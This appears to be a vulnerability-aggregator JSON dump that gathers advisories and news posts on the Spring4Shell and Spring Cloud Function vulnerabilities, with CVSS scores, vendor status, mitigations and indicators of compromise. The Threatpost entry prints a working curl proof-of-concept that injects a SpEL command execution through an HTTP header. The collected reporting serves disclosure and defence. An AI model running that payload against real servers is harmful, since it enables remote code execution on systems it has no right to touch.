Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://community.kofax.com/s/question/0D53m00006FG8NVCA1/communications-manager-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006w0My3CAE/controlsuite-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8RtCAL/readsoft-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8ThCAL/robotic-process-automation-release-announcements?language=en_US>\n * <https://community.kofax.com/s/question/0D53m00006FG8QdCAL/markview-release-announcements>\n * <https://knowledge.kofax.com/General_Support/General_Troubleshooting/Kofax_products_and_Spring4Shell_vulnerability_information>\n\n### McAfee __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-11 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=KB95447](<https://kc.mcafee.com/corporate/index?page=content&id=KB95447>)\n\n### ServiceNow __ Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * [https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f](<https://community.servicenow.com/community?id=community_question&sys_id=5530394edb2e8950e2adc2230596194f>)\n\n### TIBCO __ Unknown\n\nNotified: 2022-04-06 Updated: 2022-05-19\n\n**Statement Date: May 17, 2022**\n\n**CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.tibco.com/support/notices/spring-framework-vulnerability-update>\n\n### Alphatron Medical Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2022-04-06 Updated: 2022-04-05 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### PagerDuty Unknown\n\nNotified: 2022-04-02 Updated: 2022-04-02 **CVE-2022-22965**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 39 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://tanzu.vmware.com/security/cve-2022-22965>\n * <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n * <https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html>\n * <https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2022-22965 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2022-22965>) \n---|--- \n**Date Public:** | 2022-03-30 \n**Date First Published:** | 2022-03-31 \n**Date Last Updated: ** | 2022-05-19 16:09 UTC \n**Document Revision: ** | 22 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cert", "title": "Spring Framework insecurely handles PropertyDescriptor objects with data binding", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-05-19T16:09:00", "id": "VU:970766", "href": "https://www.kb.cert.org/vuls/id/970766", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-03-31T16:29:53", "description": "_NOTE: This post is about the confirmed and patched vulnerability tracked as [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>). While the researchers at Sysdig refer to this Spring Cloud bug as \u201cSpring4Shell,\u201d it should be noted that there is some confusion as to what to call it, with another security firm referring to a different, unconfirmed bug in Spring Core as \u201cSpring4Shell.\u201d To avoid confusion, this post has been amended to take out references to Spring4Shell altogether._\n\nA concerning security vulnerability has bloomed in the Spring Cloud Function, which could lead to remote code execution (RCE) and the compromise of an entire internet-connected host.\n\nSome researchers have noted that because of its ease of exploit and Java-based nature, it\u2019s reminiscent of the [Log4Shell vulnerability](<https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/>) discovered in December.\n\n\u201c[This] is another in a series of major Java vulnerabilities,\u201d Stefano Chierici, a security researcher at Sysdig, noted in materials shared with Threatpost. \u201cIt has a very low bar for exploitation so we should expect to see attackers heavily scanning the internet. Once found, they will likely install cryptominers, [distributed denial-of-service] DDoS agents, or their remote-access toolkits.\u201d\n\nThe bug ([CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>)) affects versions 3.1.6 and 3.2.2, as well as older, unsupported versions, according to a [Tuesday advisory](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) from VMware. Users should update to [3.1.7](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.1.7/>) and [3.2.3](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.2.3/>) in order to implement a patch.\n\n## Why Such a Low CVSS Score?\n\nWhile it carries a medium-severity score of 5.4 on the CVSS scale, researchers warned not to underestimate the bug\u2019s impact.\n\n\u201cVMware is using the CVSSv3 base metric \u2018CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L.\u2019 This is underrepresenting the confidentiality, integrity and availability impacts of this vulnerability,\u201d Sysdig researchers Nick Lang and Jason Avery told Threatpost. \u201cThis vulnerability allows an attacker to open a reverse shell in the context of the Spring Cloud service, which may be as root. The impacts are all high and do not require user interaction, which gives this CVE a critical rating.\u201d\n\nThey added, \u201cIn our testing, we verified that user interaction is not required to leverage the CVE-2022-22963 vulnerability to gain unauthorized access.\u201d\n\nSatnam Narang, staff research engineer, Tenable, agrees with the assessment that the CVSS score may not be reflective of the true impact of the issue.\n\n\u201cBecause the vulnerability is considered a remote code execution flaw that can be exploited by an unauthenticated attacker, it appears that the CVSSv3 score might not reflect the actual impact of this flaw,\u201d he said via email.\n\nPaul Ducklin, principle research scientist at Sophos, noted that it alarmingly allows for \u201cinstant RCE.\u201d\n\n\u201cMy recommendation is simple, and doesn\u2019t need a score: Patch against CVE-2022-22693 because it\u2019s attracting lots of interest, and proof-of-concept code is readily available, so why be behind when you could so easily be ahead?\u201d he told Threatpost.\n\n## **Widescale Consequences Set to Sprout**\n\nSpring Cloud is an open-source microservices framework: A collection of ready-to-use components which are useful in building distributed applications in an enterprise. It\u2019s [widely used across industries](<https://spring.io/projects/spring-cloud>) by various companies and includes ready-made integration with components from various app providers, including Kubernetes and Netflix.\n\nAs such, its footprint is concerning, according to Sysdig.\n\n\u201cSpring is\u2026used by millions of developers using Spring Framework to create high-performing, easily testable code,\u201d Chierici said. \u201cThe Spring Cloud Function framework allows developers to write cloud-agnostic functions using Spring features. These functions can be stand-alone classes and one can easily deploy them on any cloud platform to build a serverless framework.\u201d\n\nHe added, \u201cSince Spring Cloud Function can be used in Cloud serverless functions like AWS lambda or Google Cloud Functions, those functions might be impacted as well\u2026leading the attackers inside your cloud account.\u201d\n\n## **The CVE-2022-22963 Bug in Bloom**\n\nAccording to Sysdig, the vulnerability can be exploited over HTTP: Just like Log4Shell, it only requires an attacker to send a malicious string to a Java app\u2019s HTTP service.\n\n\u201cUsing routing functionality, it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) as a routing-expression to access local resources and execute commands in the host,\u201d Chierici explained. \u201cThe issue with CVE-2022-22963 is that it permits using HTTP request header spring.cloud.function.routing-expression parameter and SpEL expression to be injected and executed through StandardEvaluationContext.\u201d\n\nAs such, unfortunately, an exploit is \u201cquite easy to accomplish\u201d using a simple curl command he noted:\n\n_curl -i -s -k -X $\u2019POST\u2019 -H $\u2019Host: 192.168.1.2:8080\u2032 -H $\u2019spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\\\u201dtouch /tmp/test\u201d)\u2019 \u2013data-binary $\u2019exploit_poc\u2019 $\u2019http://192.168.1.2:8080/functionRouter\u2019_\n\n_<CURL>_\n\nSysdig published a PoC exploit on its GitHub page, and as noted, others are circulating.\n\n\u201cThe PoCs we\u2019ve seen so far have all simply popped up a calculator app, that being more than enough to prove the point, but it looks as though any command already installed on the server could easily be launched,\u201d [noted Ducklin](<https://nakedsecurity.sophos.com/2022/03/30/vmware-spring-cloud-java-bug-gives-instant-remote-code-execution-update-now/>), who refers to the bug as the \u201cSpring Expression Resource Access Vulnerability\u201d or \u201cSPEL Vulnerability.\u201d\n\nHe added, \u201cThis includes remotely triggering web downloader programs such as curl, launching command shells such as bash, or indeed doing both of those in sequence as a way of quietly and quickly implanting malware.\u201d\n\n## **Weeding Out Compromises**\n\nAfter applying the patch, anyone using applications built using Spring Cloud should take a careful inventory of their installations to make sure compromise hasn\u2019t already occurred, according to Sysdig.\n\n\u201cEven though you might have already upgraded your library or applied one of the other mitigations on containers affected by the vulnerability, you need to detect any exploitation attempts and post-breach activities in your environment,\u201d Chierici said.\n\nThat detection can be done via image scanners or a runtime detection engine to suss out malicious behaviors in already-deployed hosts or pods, he noted.\n\n\u201cThe best defense for this type of vulnerability is to patch as soon as possible,\u201d according to Sysdig\u2019s writeup. \u201cHaving a clear understanding of the packages being used in your environment is a must in today\u2019s world.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T18:04:11", "type": "threatpost", "title": "RCE Bug in Spring Cloud Could Be the Next Log4Shell, Researchers Warn", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22693", "CVE-2022-22963"], "modified": "2022-03-30T18:04:11", "id": "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "href": "https://threatpost.com/critical-rce-bug-spring-log4shell/179173/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2022-04-11T19:29:49", "description": " * Spring Framework RCE (Spring4Shell): [CVE-2022-22965](<https://www.cve.org/CVERecord?id=CVE-2022-22965>)\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n * Spring Framework DoS: [CVE-2022-22950](<https://www.cve.org/CVERecord?id=CVE-2022-22950>)\n\nn Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.\n\n * Spring Cloud RCE: [CVE-2022-22963](<https://www.cve.org/CVERecord?id=CVE-2022-22963>)\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n\nImpact\n\nThere is no impact; F5 products and services and NGINX products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:47:00", "type": "f5", "title": "Spring Framework (Spring4Shell) and Spring Cloud vulnerabilities CVE-2022-22965, CVE-2022-22950, and CVE-2022-22963", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-11T17:28:00", "id": "F5:K11510688", "href": "https://support.f5.com/csp/article/K11510688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-04-04T17:28:33", "description": "\n\nLast week researchers found the critical vulnerability CVE-2022-22965 in Spring \u2013 the open source Java framework. Using the vulnerability, an attacker can execute arbitrary code on a remote web server, which makes CVE-2022-22965 a critical threat, given the Spring framework's popularity. By analogy with the [infamous Log4Shell threat](<https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/>), the vulnerability was named Spring4Shell.\n\n## CVE-2022-22965 and CVE-2022-22963: technical details\n\nCVE-2022-22965 (Spring4Shell, SpringShell) is a vulnerability in the Spring Framework that uses data binding functionality to bind data stored within an HTTP request to certain objects used by an application. The bug exists in the _getCachedIntrospectionResults_ method, which can be used to gain unauthorized access to such objects by passing their class names via an HTTP request. It creates the risks of data leakage and remote code execution when special object classes are used. This vulnerability is similar to the long-closed CVE-2010-1622, where class name checks were added as a fix so that the name did not match _classLoader_ or _protectionDomain_. However, in a newer version of JDK an alternative method exists for such exploitation, for example, through Java 9 Platform Module System functionality. \nSo an attacker can overwrite the Tomcat logging configuration and then upload a JSP web shell to execute arbitrary commands on a server running a vulnerable version of the framework.\n\nA vulnerable configuration consists of:\n\n * JDK version 9+\n * Apache Tomcat for serving the application\n * Spring Framework versions 5.3.0 to 5.3.17 and 5.2.0 to 5.2.19 and below\n * application built as a WAR file\n\nCVE-2022-22963 is a vulnerability in the routing functionality of Spring Cloud Function that allows code injection through Spring Expression Language (SpEL) by adding a special _spring.cloud.function.routing-expression_ header to an HTTP request. SpEL is a special expression language created for Spring Framework that supports queries and object graph management at runtime. This vulnerability can also be used for remote code execution.\n\nA vulnerable configuration consists of:\n\n * Spring Cloud Function 3.1.6, 3.2.2 and older versions\n\n## Mitigations for Spring vulnerabilities exploitation\n\nCVE-2022-22965 is fixed in 2.6.6; see [the Spring blog for details](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>). \n\nTo fix CVE-2022-22963, you also need to install the new Spring Cloud Function versions; see the [VMware website for details](<https://tanzu.vmware.com/security/cve-2022-22963>). \n\nTo detect exploitation attempts, ensure that Advanced Exploit Prevention and Network Attack Blocker features are enabled. Some techniques used during exploitation can be seen in other exploits that we detect, which is why the verdict names can differ.\n\n## Indicators of Compromise\n\n**Verdicts** \nPDM:Exploit.Win32.Generic \nUMIDS:Intrusion.Generic.Agent.gen \nIntrusion.Generic.CVE-*.*\n\n**MD5 hashes of the exploits** \n7e46801dd171bb5bf1771df1239d760c - shell.jsp (CVE-2022-22965) \n3de4e174c2c8612aebb3adef10027679 - exploit.py (CVE-2022-22965)\n\n**Detection of the exploitation process with Kaspersky EDR Expert** \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/04152646/kata_spring4shell.png>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-04T15:30:36", "type": "securelist", "title": "Spring4Shell (CVE-2022-22965): details and mitigations", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2021-44228", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-04T15:30:36", "id": "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC", "href": "https://securelist.com/spring4shell-cve-2022-22965/106239/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-04-06T15:11:45", "description": "Hello everyone! This episode will be about last week's high-profile vulnerabilities in Spring. Let's figure out what happened.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239078>\n\nOf course, it's amazing how fragmented the software development world has become. Now there are so many technologies, programming languages, libraries and frameworks! It becomes very difficult to keep them all in sight. Especially if it's not the stack you use every day. Entropy keeps growing every year. Programmers are relying more and more on off-the-shelf libraries and frameworks, even where it may not be fully justified. And vulnerabilities in these off-the-shelf components lead to huge problems. So it was in the case of a very critical Log4Shell vulnerability, so it may be in the case of Spring vulnerabilities.\n\n[Spring](<https://spring.io/>) is a set of products that are used for Java development. They are developed and maintained by VMware. The main one is Spring Framework. But there are a lot of them, [at least 21 on the website](<https://spring.io/projects/spring-framework>). And because Spring belongs to VMware, you can find a description of the vulnerabilities on the [VMware Tanzu website](<https://tanzu.vmware.com/security>). VMware Tanzu is a suite of products that helps users run and manage multiple Kubernetes (K8S) clusters across public and private \u201cclouds\u201d. Spring is apparently also part of this suite and therefore Spring vulnerabilities are published there. Let's look at the 3 most serious vulnerabilities published in the last month.\n\n## **[CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>): "Spring4Shell", Spring Framework remote code execution (RCE) via Data Binding on JDK 9+**\n\nSpring Core Framework is widely used in Java applications. It allows software developers to develop Java applications with enterprise-level components effortlessly. \n\nSpring4Shell vulnerability allows remote attackers to plant a web shell when running Spring Framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger and allow full remote access. In fact it is a patch bypass of the old CVE-2010-1622 vulnerability that was introduced 12 years ago.\n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. \n\nThe specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, that is the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n\n * JDK 9 or higher\n * Apache Tomcat as the Servlet container\n * Packaged as WAR\n * spring-webmvc or spring-webflux dependency\n * Spring Framework 5.3.0 to 5.3.17, 5.2.0 to 5.2.19. Older, unsupported versions are also affected\n\nThere are [signs of exploitation in the wild](<https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/>) for this vulnerability. There are more than 30 repositories with [PoC and examples of vulnerable applications on github](<https://github.com/search?q=CVE-2022-22965>). \n\nIn short, look for Spring Framework applications on your Tomcats and then update them to version 5.3.18 and 5.2.20. \n\nQualys [recommendations for Linux](<https://blog.qualys.com/vulnerabilities-threat-research/2022/03/31/spring-framework-zero-day-remote-code-execution-spring4shell-vulnerability>):\n\n * Find java 9+ with `locate`\n * Find "`spring-webmvc-*.jar`", "`spring-webflux*.jar`" or "`spring-boot*.jar`" in `ls -l /proc/*/fd`\n\nAs an option, you can try to update the Tomcats first. it is easier. While CVE-2022-22965 resides in the Spring Framework, the Apache Tomcat team [released new versions of Tomcat](<https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative>) to \u201dclose the attack vector on Tomcat\u2019s side.\u201d \n\nThe remaining two vulnerabilities are in rarer components that are not part of the Spring Core Framework.\n\n## [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>): Remote code execution in Spring Cloud Function by malicious Spring Expression\n\nSpring Cloud Function is a serverless framework for implementing business logic via functions.\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. Users of affected versions should upgrade to 3.1.7, 3.2.3. No other steps are necessary. \n\nThere are also [PoCs for this vulnerability](<https://github.com/me2nuk/CVE-2022-22963>). \n\nAnd finally, I would like to finish with a vulnerability that came out a month ago. And went quite unnoticed.\n\n## [CVE-2022-22947](<https://tanzu.vmware.com/security/cve-2022-22947>): Spring Cloud Gateway Code Injection Vulnerability\n\nSpring Cloud Gateway aims to provide a simple, yet effective way to route to APIs and provide cross cutting concerns to them such as: security, monitoring/metrics, and resiliency.\n\nApplications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n\nUsers of affected versions should apply the following remediation. 3.1.x users should upgrade to 3.1.1+. 3.0.x users should upgrade to 3.0.7+. If the Gateway actuator endpoint is not needed it should be disabled via management.endpoint.gateway.enabled: false.\n\nThere are also PoCs for this vulnerability not only in Github, but [also in public packs](<https://vulners.com/exploitdb/EDB-ID:50799>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-03T00:15:45", "type": "avleonov", "title": "Spring4Shell, Spring Cloud Function RCE and Spring Cloud Gateway Code Injection", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-03T00:15:45", "id": "AVLEONOV:D75470B5417CEFEE479C9D8FAE754F1C", "href": "https://avleonov.com/2022/04/03/spring4shell-spring-cloud-function-rce-and-spring-cloud-gateway-code-injection/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2022-12-20T00:10:35", "description": "A critical vulnerability can send countless organizations into chaos, as security teams read up on the vulnerability, try to figure out whether it applies to their systems, download any potential patches, and deploy those fixes to affected machines. But a lot can go wrong when a vulnerability is discovered, disclosed, and addressed--an inflated severity rating, a premature disclosure, even a mixup in names.\n\nIn these instances, when the security community is readying itself for a major sea change, what it instead gets is a ripple. Here are some of the last year's biggest miscommunications and errors in security vulnerabilities. \n\n## 1\\. \"Wormable\"\n\nThere are some qualifications for vulnerabilities that send shivers up the spine of the security community as a whole. A "wormable" vulnerability is used when the possibility exists that an infected system can contribute as an active source to infect other systems. This makes the growth potential of an infection exponential. You'll often see the phrase "WannaCry like proportions" used as a warning about how bad it could get.\n\nWhich brings us to our first example: [CVE-2022-34718](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34718>), a Windows TCP/IP Remote Code Execution (RCE) vulnerability with a [CVSS rating](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) of 9.8. The vulnerability could have allowed an unauthenticated attacker to execute code with elevated privileges on affected systems without user interaction, which makes it \"wormable,\" but in the end, it turned out to be not so bad since it only affected systems with IPv6 and IPSec enabled and it was patched before an in-depth analysis of the vulnerability was [publicly disclosed](<https://medium.com/numen-cyber-labs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf>).\n\n## 2\\. Essential building blocks\n\nSomething we've learned the hard way is that there are very popular libraries maintained by volunteers, that many other applications rely on. A library is a set of resources that can be shared among processes. Often these resources are specific functions aimed at a certain goal which can be called upon when needed so they do not have to be included in the code of the software. A prime example of such a library that caused quite some havoc was [Log4j](<https://www.malwarebytes.com/blog/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>).\n\nSo, when [OpenSSL announced](<https://www.malwarebytes.com/blog/news/2022/10/critical-openssl-fix-due-november-1st-get-ready-to-patch>) a fix for a critical issue in OpenSSL, everybody remembered that the last time OpenSSl fixed a critical vulnerability, that vulnerability was known as [Heartbleed](<https://www.malwarebytes.com/blog/news/2019/09/everything-you-need-to-know-about-the-heartbleed-vulnerability>). The Heartbleed vulnerability was discovered and patched in 2014, but infected systems kept popping up for years.\n\nHowever, when the patch came out for the more recent OpenSSL issue, it turned out the bug had been [downgraded in severity](<https://www.malwarebytes.com/blog/news/2022/11/openssl-bug-downgraded-in-severity-patches-now-available>). That was good news all around: The patch for the two vulnerabilities is available, and the announced vulnerability wasn't as severe as we expected. And there is no known exploit for the vulnerabilities doing the rounds.\n\n## 3\\. Zero-day\n\nThe different interpretations for the term zero-day tend to be confusing as well.\n\nThe most accepted definition is:\n\n> "A zero-day is a flaw in software, hardware or firmware that is unknown to the party or parties responsible for patching or otherwise fixing the flaw."\n\nBut you will almost as often see something called a zero-day because the patch is not available yet, even though the party or parties responsible for patching or otherwise fixing the flaw are aware of the vulnerability. For example, Microsoft uses this definition:\n\n> "A zero-day vulnerability is a flaw in software for which no official patch or security update has been released. A software vendor may or may not be aware of the vulnerability, and no public information about this risk is available."\n\nThe difference is significant. The fact that a vulnerability exists is true for almost any complex platform or software. Someone has to find such a vulnerability before it becomes a risk. Then it depends on the researcher finding the flaw whether it becomes a threat. If the researcher follows the rules of responsible disclosure, the vendor will be made aware of the existence of the flaw before anyone else, and the vendor will have a chance to find and publish a fix for the bug before any malicious actors find out about it.\n\nSo, for a vulnerability to be alarming, I would argue it has to be used in the wild or a public Proof-of-Concept has to be available _before_ the patch has been released.\n\nAs an example of where this went wrong, a set of critical RCE [vulnerabilities in WhatsApp](<https://www.malwarebytes.com/blog/news/2022/09/critical-whatsapp-vulnerabilities-patched-check-youve-updated>) got designated as a zero-day by several outlets, including some that should know better. As it turned out, the vulnerabilities listed as [CVE-2022-36934](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36934>) and [CVE-2022-27492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27492>) were found by the WhatsApp internal security team and silently fixed, so they never posed any actual risk to any user. Yes, the consequences would have been disastrous if threat actors had found the vulnerabilities before the WhatsApp team did, but there never were any indications that these vulnerabilities had been exploited.\n\n## 4\\. Spring4Shell\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database as an individual number. CVE numbers are very helpful because they are unique and used in many reliable sources, so they make it easy to find a lot of information about a particular vulnerability. But they are hard to remember (for me at least). Coming up with fancy names and logos for vulnerabilities names, such as Log4Shell, Heartbleed, and Meltdown/Spectre helps us to tell them 